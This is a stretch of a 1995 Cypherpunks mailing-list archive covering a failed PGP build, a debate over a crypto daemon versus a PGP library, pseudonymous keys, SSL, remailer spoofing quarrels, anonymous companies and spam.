Definitions File [nul.def]:  /NOI /STACK:12288 /BATCH /ONERROR:NOEXE
/EXE /FAR /
PACKC;

RSAGEN.obj(rsagen.c) : error L2029: '_rsa_public_decrypt' : unresolved
external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_decrypt' : unresolved
external
RANDOM.obj(random.c) : error L2029: '_randPoolGetByte' : unresolved
external
RANDOM.obj(random.c) : error L2029: '_randPoolStir' : unresolved
external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_encrypt' : unresolved
external
IDEA.obj(idea.c) : error L2029: '_randPoolGetBytes' : unresolved
external
RANDOM.obj(random.c) : error L2029: '_randPoolAddBytes' : unresolved
external
RSAGEN.obj(rsagen.c) : error L2029: '_rsa_private_encrypt' :
unresolved external

CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_encrypt' :
unresolved external

RANDOM.obj(random.c) : error L2029: '_sleep' : unresolved external
RANDOM.obj(random.c) : error L2029: '_noise' : unresolved external
PGP.obj(pgp.c) : error L2029: '_noise' : unresolved external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_decrypt' :
unresolved external


NMAKE : fatal error U1077: 'LINK' : return code '0x2'
Stop.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Anarchives <tao@presence.lglobal.com>
Date: Sun, 19 Nov 1995 01:06:11 +0800
To: cypherpunks@toad.com
Subject: pgp on bsdi 2.0
Message-ID: <Pine.BSD/.3.91.951118165249.10950A-100000@presence.lglobal.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I'm having trouble getting pgp compiled on bsdi 2.0.

Can someone who has successfully done this please email me with some help :)

thanx

	http://www.lglobal.com/TAO/
         ___         ___            ___
        /  /\       /  /\          /  /\
       /  /:/      /  /::\        /  /::\
     /  /:/       /  /:/\:\      /  /:/\:\
    /  /::\      /  /:/ /::\    /  /:/  \:\   
   /__/:/\:\    /__/:/ /:/\:\  /__/:/ \__\:\     
   \__\/  \:\   \  \:\/:/__\/  \  \:\ /  /:/ 
        \  \:\   \  \::/        \  \:\  /:/
         \  \:\   \  \:\         \  \:\/:/
          \  \:\   \  \:\         \  \::/
	   \__\/    \__\/          \__\/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 19 Nov 1995 09:32:38 +0800
To: cypherpunks@toad.com
Subject: Spammers' Email List Obtained!!!
Message-ID: <Pine.ULT.3.91.951118170439.9992B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Using only the tools provided by the spammer, and without compromising
system security in any way, we have obtained the full list of email
addresses that were used by the bulkd@valleynet.net direct email spammer.
I am not going to tell the public how to get it because I do not want this
list to fall into the wrong hands. 

There are several curious features about the list that strongly suggest
that it was purchased from other spammers. I *strongly encourage* the
person who formerly used the bulkd@valleynet.net account to apologize to
news.admin.net-abuse.misc and provide us with the source of the list
immediately. 

- -rich
 llurch@networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK6E943DXUbM57SdAQHopwP/aY+cRnmrtUBhILl7lvfeQakrpW+uLwuY
J1jR6SrSFdiZ+rGM8D4tc5HarOrU77X2zjpqDNOFySJ+yukP3eXvKny3v+3ndUGA
ozbnH5EnshOQZE0hQ+aV9TKu+zM0ihfT65PxuvgehPnBi+CgSRHtDddhjuWMvRSD
aNGKoAyZLaA=
=mKyw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 19 Nov 1995 02:26:35 +0800
To: cypherpunks@toad.com
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <Pine.BSD.3.91.951118163828.463A-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, Adam Shostack wrote:

> Raph Levien wrote:
> 
> |    I propose that the new interface lives as a sort of daemon, rather
	[snip]
> | 
> 
> 	A daemon per user, or per machine?  Either way, I think you
> run into problems on a big multi-user machine.  (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.
> 
        _anything_ that has open access on a piece of hardware is a point
     of intrustion --sendmail for instance, or open password files, etc. 
     the issue is trading off risks to _maximize_ security and 
     impenatrable access.

        even assuming we were to post 100% of the source code, a
     translation daemon is a _translation_ model --even if it is capable
     of translating pgp, garbage in equals nothing out...

        one of the biggest problems with _any_ crypto system, and pgp is 
     no exception, is tmp files, followed closely by insecure memory.
     insecure memory is a separate issue, but some of the temporary file
     problems can be relegated to reduced risk by passing the daemon the
     user's preferred location for tmp file --for instance, on any net
     access machine, I globally specify TMP, TEMP, etc to a local tmp
     directory which is at least somewhat safer than public tmp files.
     obviously, you expect the daemon to wipe clean each memory block 
     before it free()s it --I's sure we all have routines handy for that.

        presuming the daemon is constructed so it can only respond to its
     current process owner, this leaves the security problem of swapping 
     in a daemon which also responds to an interloper --and this same risk
     applies to a libppg or a .dll file (more so to a .dll file) to an 
     even greater degree.  However, if a daemon is swapped, the system has
     a more _serious_ problem with the system administrator, not the
     daemon.

        if the IPC strings are intercepted in the daemon initializtion, 
     again we have a basic hardware and system security problem.

     Even If Ralph Levian believes daemons are serious risk problems 
     (which they can be if not properly implemented), I do not agree that 
     the libppg() or .dll offer anything additional.  I dont presume to 
     believe that anything is safe anyway, just safer than the alter-
     native.

        NB:  _nothing_ should ever be assumed secure! 

             assumption is fuckup's mother.  

        one must hope to have considered every possible line of attack, 
     and a few which have not been conceived, which goes back to our
     cypherpunk "credo" which says that private standards are not safe
     --let's all have at it --even if we break it, there probably is a way
     to block the attack, we just did not block it or consider it the
     first time,
     
        I have been playing with all three approaches, and I keep going 
     back to the daemon despite the fact it is not portable to the brain
     dead. 

             I don't know if W95 permits daemons as I have ignored MS
             for a number of years --if I can not run as many processes
             as I want without some MickeySoft program blowing away a
             day's work.... I prsume NT will run 'em, and maybe the 
             next release of NT will be more useable, more secure, and
             more stable.

        Since pgp() has been pulled from crypto10, I need to modularize 
     pgp to a pgp() and include the relevant goodies such as MIME and its 
     variations.  And, of course, we need all the "we do it here" types to
     buy into a standard interface.

        And, to add fuel:  the module needs the ability to encode and 
     place clear text into a MIME format specified by the calling program.

> 	Its an interesting proposal, but let me ask you this--Why is
> it better than a libpgp (or pgp.dll) that offers a variety of services
> to programs at multiple levels (ie, offers full one call RSA/IDEA
> encryption and compression, as well as ascii armoring, or offers each
> of those as a seperate function.
> 
	not necessarily better. but a valid approach IMHO.  I for one 
     think it would be easy enough to sell IAPs on a daemon.

> 
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 19 Nov 1995 08:06:31 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
In-Reply-To: <199511182325.PAA04123@jobe.shell.portal.com>
Message-ID: <199511182351.SAA00184@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I hope everyone realizes that Detweiler is probably arguing with
himself, three levels deep. I must admit that the levels he stoops to
in order to draw attention to himself are pathetic. Why don't you just
stick to posting as Vlad Nurzi? Its more dignified.

anonymous-remailer@shell.portal.com writes:
> On Sat, 18 Nov 1995 anonymous-remailer@shell.portal.com wrote:
> 
> > >Taking three successive news stories from three days ... (press stories,
> > >I've since pulled for my own reference) and pasting them together to
> > >indicate some type of Machiaevellian?? (sp) exercise is simply "not done."
 
> > 
> > I still feel such a sense of violation with what LD did, such an utter
> > sense of helplessness at the character assassination I've suffered at his
> > hands, that I feel that I must take some token action to "set the
> > record straight".  Something which clears my name.
> > 
> > Here is the TRUE unedited story for the list which Deitweiler felt he
> > had to TWIST to the nth degree.  His attempt at making mountains out
> > of mole hills will not succeed with this one.
> 
> This story truly is a non-starter.  Big deal.  It really has no
> relevance to this international list.  This is simply a Canadian matter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 19 Nov 1995 09:01:13 +0800
To: perry@piermont.com
Subject: [NOISE] LD is Canadian?
In-Reply-To: <199511182351.SAA00184@jekyll.piermont.com>
Message-ID: <95Nov18.194403edt.330@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I hope everyone realizes that Detweiler is probably arguing with
> himself, three levels deep. I must admit that the levels he stoops to
> in order to draw attention to himself are pathetic. Why don't you just
> stick to posting as Vlad Nurzi? Its more dignified.

Appealing as the idea is, some of these posts have shown a good understanding
of Canadian politics and current events.  I think it unlikely that LD could
have written all of them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 09:07:51 +0800
To: cypherpunks@toad.com
Subject: negative reputation (was: WRITTEN CODE)
Message-ID: <199511190053.TAA21421@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Daniel 'genius' Charpentier <drcharpe@hamlet.uncg.edu> wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die.  I am a new commer to
> cryptography and I know I shouldn't be posting yet but that is
> what I thought cypherpunk postings was supposed to be in the first
> place ( program code, protocols, and algorithms ).  Please don't
> flame me to badly for this message.  I am doing everything I am
> supposed to before posting ( reading the FAQ's, the entire
> cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )

It sounds like you are afraid of getting a negative reputation.
Well don't be.  Simply create a persistent pseudonym and sign your
messages with it instead.  That way, if it turns out that everyone
disagrees with you and/or flames you to death, you can simply
disgard your old pseudonym.  Otherwise you keep your pseudonym and 
continue to post under it.  This technique is not new, so you may 
already have seen it in the archive.

Logically, a pseudonym is simply a public key.  However you may want
to give it a human-readable name so other people may more easily refer 
to it.  If you decide to do this, I suggest that you do not name the key 
on its first post because there is a high probability that you will decide 
to disgard the key.  If you name it and throw it away, then you have
unnecessarily cluttered up the limited name space.

 - a new entity, as yet unnamed

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK5/P42Fr67QcvwZAQGVdwP5AaE5MR8JztPBv1k/0GdVlZSzuBBMboRW
d7Ofyw2EloKS7YTgb+ZoGDT92h+n5Yzpp5Jb5+0zm8iDLQbm0RTQJxE86Ty4DrO4
5w1CUCSa8VF4mTVoRvyaYrWHTq4uxOj4LAPC6Zxx5qIPUSRgceWoYsmEoarIYYLU
FEhnF34o5m0=
=T80R
- -----END PGP SIGNATURE-----

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCuftgAAAEEAL35udZ/l0s590SjtzSM9eAepxAGe9Mp38ZoTsvfmNQh008W
sLtiYKmSYKBPuuRZIpYBZEjLZry5p6xHUpsKuflNXy7sdeHBviU+x8J57ip4DLx2
+tlv4dtjLKxzVGEqEfWOb3oRHCJ1t2IgV5A9RBzp2SXke56pTo2Fr67QcvwZAAUT
tBxhIG5ldyBlbnRpdHksIGFzIHlldCB1bm5hbWVk
=h9Uo
- -----END PGP PUBLIC KEY BLOCK-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK5/9SoZzwIn1bdtAQFS0wF+NyWTvLIZr05q8O4LOCgM0W1lHKBy+iu3
P3k3Yy7+FIS15erO88CDpwIBbywqQ+Pa
=wJn0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sun, 19 Nov 1995 12:37:53 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.3.89.9511181615.A21921-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511190419.UAA15156@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca wrote:
> MOSS?

MIME Object Security Services. It's a technically superior alternative
to PGP, but one with an uncertain future. It's not being actively
developed by anyone other than TIS, and their TISMOSS prototype
implementation is far from being generally usable.

For more information on the standard, see RFC 1848:
      http://ds.internic.net/rfc/rfc1848.txt

For more information on the TIS effort, see:
      http://www.tis.com/docs/Research/moss.html

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 10:34:15 +0800
To: cypherpunks@toad.com
Subject: Anderson on SSL
Message-ID: <iBiseD41w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the mags I get for free is called _OEM_. It recently ran an interview
with Marc Anderssen from Netscape. I'll key in a few crypto-relevant passages.

...

Q. Everyone's looking for ways to make money on the World Wide Web. What is the
future for advertisers on the Web?

A. Advertisements in an interactive medium definitely function best as a
service; really, the line between advertising, informational marketing and
direct sales blurs incredibly quickly. I expect a lot of creativity to be
devoted to pulling people into commercial sites and keeping them there,
including continuing sponsorship of innovative content.

Q. Do you see many small transactions as a possible model for making money on
the Web?

A. Tiny transactions will be a part of the grand scheme of things. They'll make
possible the 2-cent joke of the day and lots of appropriate forms of content.

Q. How will people deal with getting costs down for each transaction to eke out
a profit?

A. That's the challenge for the companies that intent to make money processing
tiny transactions. I can't wait to see who does it first.

Q. Now that the InterNIC has started to charge for domain names, do you, as an
Internaut, miss the anarchistic, "anything goes" community the Net once was?

A. The Internet was never really anarchistic and "anything goes". It was always
a cooperative venture that everyone derived benefit from. That's pretty much
the case.

In fact, I still get a thrill -- more now than ever -- when I go through
directories like Yahoo. There's much more out there on the Net now. Everything
is accelerating.

...

Q. Do you think that the Netspace's Secure Sockets Layer (SSL) is the de facto
standard for Internet security now?

A. SSL is a de facto standard, widely adopted throughout the industry by
Microsoft, Novell, Apple, IBM, Sun, Digital Equipment, Intel, MasteCard, Visa,
etc. The security space is a very broad space, though, and SSL solves a
specifically defined set of problems: encryption and authentication for a
secure data channel over TCP/IP.

There are many other problems yet to solve. Other protocols will play a role in
solving those problems, and we will support them.

Q. What happened to the deal with Enterprise Integration Technologies and its
Secure Hypertext Protocol (S-HTTP), which was Netscape's only real competition
in the area of secure server software?

A. Early this year, we announced that Netscape (along with IBM/Prodigy, America
Online and Compuserve) became an investor and partner in Terisa Systems, which
was previously a joint venture of EIT and RSA Data Security. All Parties agreed
to support both SSL and S-HTTP.

Unfortunately, Terisa has been unable to ship its toolkit, so things haven't
gone as well as we had all hoped. In the meantime, virtually everyone is
supporting SSL [but not S-HTTP].

Q. Do you think that your server software, and especially your protocol Secure
Courier, will lessen the public perception that credit-card entries aren't safe
on the Net?

A. I think it's happening. We're in the middle of a broad shift in consumer
behavior, and there will be a lot of exciting things happening over the next
few years as a result. Things are definitely warming up right now.

Of course, one of the great things about doing business on the Net is that it's
a lot cheaper for the merchant than doing business in the "real" world. One of
the broad trends we're starting to see is that a lot of entrepreneurial
companies will be coming up on the Net. They, more than anyone, will help drive
the shift in consumer behavior by offering innovative goods and services and
innovative ways.

...

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 12:52:55 +0800
To: cypherpunks@toad.com
Subject: Re: (CANADIAN PRESS REPORTS)
Message-ID: <199511190440.UAA01341@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, jim bell wrote:

> >anonymous writes:
> >> I still feel such a sense of violation with what LD did, such an
> >> utter sense of helplessness at the character assassination I've
> >> suffered at his hands, 
> >
> >So use PGP, sign your messages.  Simple solution.
> 
> Absolutely!  Anybody who uses anonymous remailers to post to public areas,
> and does not use digital signatures to prevent spoofing when it is obviously
> needed, is a fool or worse.

Most people believe THAT a digital signature is evidence that I am who my
signature _says_ I am when it really doesn't do that at all.  It isn't
reliable at all. 

Unfortunately, I've learned the hard way NOT to do that.  Digital 
signatures don't prevent spoofing.

In fact, I think that thinking something is secure when it isn't leads 
to even more trouble, and could even lead to many tragedies.

In a nutshell, here's the problem.

If someone takes my pgp secret keyring and my password, then they can 
sign a message *digitally* so that people believe the spoofed message is 
really from me.  In fact, since most people tend to rely on a pgp message 
far more than a non-pgp message, most people would be absolutely 
convinced that the message was in fact from me.

Signing with PGP is just not a solution.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 19 Nov 1995 14:19:30 +0800
To: cypherpunks@toad.com
Subject: Re: negative reputation (was: WRITTEN CODE)
Message-ID: <199511190558.VAA11128@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:53 PM 11/18/95 -0500, a new entity, as yet unnamed wrote:
>Logically, a pseudonym is simply a public key.  However you may want
>to give it a human-readable name so other people may more easily refer 
>to it.  If you decide to do this, I suggest that you do not name the key 
>on its first post because there is a high probability that you will decide 
>to disgard the key.  If you name it and throw it away, then you have
>unnecessarily cluttered up the limited name space.
>
> - a new entity, as yet unnamed

Here's the new entity's key, signed :-)  I haven't added it to the
PGP key servers; I'll leave that up to you...

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

mQCNAzCuftgAAAEEAL35udZ/l0s590SjtzSM9eAepxAGe9Mp38ZoTsvfmNQh008W
sLtiYKmSYKBPuuRZIpYBZEjLZry5p6xHUpsKuflNXy7sdeHBviU+x8J57ip4DLx2
+tlv4dtjLKxzVGEqEfWOb3oRHCJ1t2IgV5A9RBzp2SXke56pTo2Fr67QcvwZAAUT
tBxhIG5ldyBlbnRpdHksIGFzIHlldCB1bm5hbWVkiQCVAwUQMK61KfnzJsm1fsvF
AQGJeAP/c0DO4e1y4SIpLAF9vJwqr6ewFHWopHJRprWUUyBhH+TRehOQLPgocwR/
7lOILgfizrLshu5W5fOyY+pjBVj6LssF8dILMe81I5LjlDT58NVtkfPDdkHNxFpf
fgEmJlKYYfsCrXDlwn0RAFwzLC1x+1okAoixhvLWx7ygr1rpyKA=
=PED/
-----END PGP PUBLIC KEY BLOCK-----
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 19 Nov 1995 11:29:05 +0800
To: davidm@iconz.co.nz
Subject: Re: Anonymity and Intellectual Capital
Message-ID: <v02120d03acd44a063fd4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>I suggest that arbitration is well suited to
>pseudonymous commerce, and  propose the use of an old device - the
>unincorporated, or deed of settlement, company.


First of all, this is a damn fine post. Outstanding!

The first thing that strikes me about all this is how time seems to be
"unwinding" as far as centralization of power, or anything else, is
concerned.

I've ranted about all this here and elsewhere, how falling semiconductor
prices, public networks and strong cryptography beget the reemergence of
bearer certificates, this time in digital form (of which ecash is only the
prima facie example, the existence proof) and what I call, for lack of a
better term, a "geodesic", instead of hierarchical, economy.

We're seeing in this "unincorporated company" idea the devolution, the
surfacting, of concentrations of information, and thus power, back out to
individuals, and with that, responsibility, and of course, freedom.

Truly marvelous. Hope there's more where that one came from.

Cheers,
Bob Hettinga





-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 14:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511190612.WAA15057@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here (the real one) ...

On Sat, 18 Nov 1995, Perry E. Metzger wrote:

> I hope everyone realizes that Detweiler is probably arguing with
> himself, three levels deep. I must admit that the levels he stoops to
> in order to draw attention to himself are pathetic. Why don't you just
> stick to posting as Vlad Nurzi? Its more dignified.

Deitweiler certainly is getting around ... but I'm beginning to have
my doubts whether it is Deitweiler who is spoofing me.  

And Deitweiler might be Vlad Nurzi or whoever, but it seems that
whoever is spoofing me -- whether it is Detweiler or not -- is privy
to certain "facts" ... verifiable facts ... some of which are very
worrisome.

And its not just whatever news is breaking over the wire.

anonymous-remailer@shell.portal.com writes:
> > 
> > Here is the TRUE unedited story for the list which Deitweiler felt he
> > had to TWIST to the nth degree.  His attempt at making mountains out
> > of mole hills will not succeed with this one.
> 
> This story truly is a non-starter.  Big deal.  It really has no
> relevance to this international list.  This is simply a Canadian matter.

I take this last comment back.  It was premature.  I think that this
is in fact very relevant to this list.  And it's not just a Canadian
matter.

My little spoofing-shadow, Mr. Mystery-Writer, seems to not only have
a juvenile sense of humour, but seems to have a handle on some pretty
sensitive information.  

His information isn't limited to how Canada was able to outbid the 
United States on a wheat deal with China, but his information 
encompassess matters of an order of greater significance, especially
when Mr. Mystery-Writer wrote: 

> And that's the fleshed out version of the story.
>
> I'm just sorry that our Prime Minister is in such a bad position because 
> of the timing of this "Jane Shorten's" revelations.  She also revealed 
> that Canada spied on Japan.
> 
> To think ... Canadian Prime Minister Chretien is a guest of the Japanese
> people today.  Talk about some awkward moments.  I mean, what on earth do
> you talk about?? 
> 
> George Bush and Sushi??

Whoever it was who wrote this, they took a real swipe at a former
President of the United States.  This is very, very serious.  Joking
about Japanese / American relations is very black humour and is one
thing, but taking an open swipe at a former American President is
grossly inappropriate and was completely another, I thought.

But, ironically, Mr. Mystery-Writer had incredible foreshadowing
skills.

> Let's see ... over the last couple of days, we've had one provincial
> Premier resign over "BingoGate" -- kickbacks from bingo games, another
> premier is under some pretty heavy fire for some insider trading in a
> company he promoted in Hong Kong, (actually his wife got stock she never
> had to pay for), while Canada in conjunction with the normally very
> neutral Swiss have frozen accounts pertaining to about $20 million or so
> in kickbacks from Airbus Industries to a "senior Canadian politician".
>
> And all these stories ... coincidentally ... broke back to back.

This to me was the kicker ... especially in light of news which just
broke tonight.  Mr. Mystery-Writer was trying to throw a clue.
And boy, what a clue it was.

It wasn't the former President of the United States that he was
speaking of ... it was the former Prime Minister of Canada.

It was reported today that former Canadian Prime Minister Brian
Mulroney has launched a $50 Million pre-emptive lawsuit against the
Royal Canadian Mounted Police and the Canadian Department of Justice
for their possible future allegation or possible future charge of
taking kickbacks from Airbus Industries while the former Prime
Minister held public office.

This is one heck of a newsflash ... especially considering the
co-operation of the normally secretive and discreet authorities in
Switzerland.

Can you imagine if former President George Bush had in fact launched a
$50 Million pre-emptive lawsuit against the Federal Bureau of
Investigation and the Department of Justice, because they were
investigating him for something??  

Or if George Bush tried to stop a news story through libel chill?

My shadow was right (even if he did announce before the wires, did),
Canadian politicians are beginning to drop like flies.  

Let the "Jane Shorten" Film-Fest begin.  Can you pass the popcorn?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 19 Nov 1995 12:06:51 +0800
To: davidm@iconz.co.nz
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <pnr598536982o@iconz.co.nz>
Message-ID: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 18 Nov 1995, David Murray wrote:

> To pick up on a couple of Professor Post's ideas - limited liability of
> untraceable pseudonyms, and choice of rule sets in cyberspace (see Post,
> "Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace"
> 1995 J Online Law art 3), I suggest that arbitration is well suited to
Great! Where? (damn I should keep my older posts for a bit longer)

> pseudonymous commerce, and  propose the use of an old device - the 
> unincorporated, or deed of settlement, company.

Interesting. I just read that Liechtenstein allows anonymous corporations
(as in you register for it anonymously). I'm curious to know how this 
works (if I've got it right). It might also become rather interesting 
when one enterprising tax haven permits registration for these things 
online (and hopefully automatically, for the proper anon fee).

Barring escrow services, I don't see how contracts (or a lot of 
other laws) could be enforced against these entities when they can simply pop 
in and out of existence (unless they have some physical counterpart, like 
a storefront and merchandise. But then these are easily linkable to True 
Names, unlike software companies, financial services or any other part of 
the info economy.)

The value of a reputation is not particularly high in lots of cases or is 
occasionally worth throwing over for a big one-time scam. (Pyramid scams
for "reputable" banks)
While I'd love to set one up, I would never do any risky commerce with one.

Besides, if companies in general can set up other companies, in a 
trustworthy and non-anon jurisdiction, couldn't these foreign anon companies 
do the same in the present system and therefore make it very hard to know 
if any company in any country is non-anon? Are there any present legal 
barriers against this? 

I don't know much about the requirements of incorporation or the natures
of various types of corporations, so please feel free to correct me.
I'm not completely sure I understood your explanation of a 
deed-of-settlement corp. and the idea of an "unincorporated" company. 
(Unincorporated in what way, and what were the registration and ID 
requirements?)

Any references? Thanks.

Ps. I know I could probably look this up, but exactly what are bearer bonds?
I frequently hear them mentioned when market anonymity and money laundering 
come up.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 20 Nov 1995 20:53:43 +0800
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511200542.VAA04645@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:47 PM 11/19/95 -0500, Ray Cromwell wrote:
>
>  Is anyone else getting lots of junk e-mail lately?

Yes.

When people spam usenet, they get hit by a large highly organized 
counter attack.  When they spam people by email, no large
counter attack -- we need a place were people go to share 
knowledge of email abuse.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sun, 19 Nov 1995 12:20:59 +0800
To: cypherpunks@toad.com
Subject: .Sig Heilarchy
Message-ID: <199511190403.XAA28059@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain




.SIG HEILARCHY REVEALED


>Logically, a pseudonym is simply a public key.  However you may want
>to give it a human-readable name so other people may more easily refer 
>to it.  If you decide to do this, I suggest that you do not name the key 
>on its first post because there is a high probability that you will decide 
>to disgard the key.  If you name it and throw it away, then you have
>unnecessarily cluttered up the limited name space.
>
> - a new entity, as yet unnamed

"Cluttering up the namespace" is a growing problem. Fortunately, the InterNIC has taken on the important task of registering pseudonyms, and will coordinate the issuance of new pseudonyms with the Postal Service.

[The issuance of these items is temporarily on hold due to the Government Shutdown (tm).]

The fee for this will likely be quite reasonable, in the $300/year range, consistent with SAIC's plans for other emerging markets.

The InterNIC also sees great promise in collecting fees for .sig blocks, tentatively priced at $10 per line per year. As SAIC Chairman Bobby Ray Inman points out, this is the easiest way to control the proliferation of long .sig blocks.

--Klaus! von Future Prime, a Sanctioned Pseudonym

[.sig removed by order of the InterNIC .Sig Heilarchy until Herr von Future Prime sends us his past due amount]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sun, 19 Nov 1995 14:55:42 +0800
To: cypherpunks@toad.com
Subject: Re: (CANADIAN PRESS REPORTS)
Message-ID: <m0tH33n-00091vC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Detweiler wrote...

>On Sat, 18 Nov 1995, jim bell wrote:
>
>> >anonymous writes:
>> >> I still feel such a sense of violation with what LD did, such an
>> >> utter sense of helplessness at the character assassination I've
>> >> suffered at his hands, 
>> >
>> >So use PGP, sign your messages.  Simple solution.
>> 
>> Absolutely!  Anybody who uses anonymous remailers to post to public areas,
>> and does not use digital signatures to prevent spoofing when it is obviously
>> needed, is a fool or worse.
>
>Most people believe THAT a digital signature is evidence that I am who my
>signature _says_ I am when it really doesn't do that at all.  It isn't
>reliable at all. 
>
>Unfortunately, I've learned the hard way NOT to do that.  Digital 
>signatures don't prevent spoofing.
>
>In fact, I think that thinking something is secure when it isn't leads 
>to even more trouble, and could even lead to many tragedies.
>
>In a nutshell, here's the problem.
>

WARNING!  WARNING!  WARNING!  BIG "IF" COMING UP!  BIG "IF" COMING UP!!!


>If someone takes my pgp secret keyring and my password, then they can 
 ^^

>sign a message *digitally* so that people believe the spoofed message is 
>really from me.  In fact, since most people tend to rely on a pgp message 
>far more than a non-pgp message, most people would be absolutely 
>convinced that the message was in fact from me.

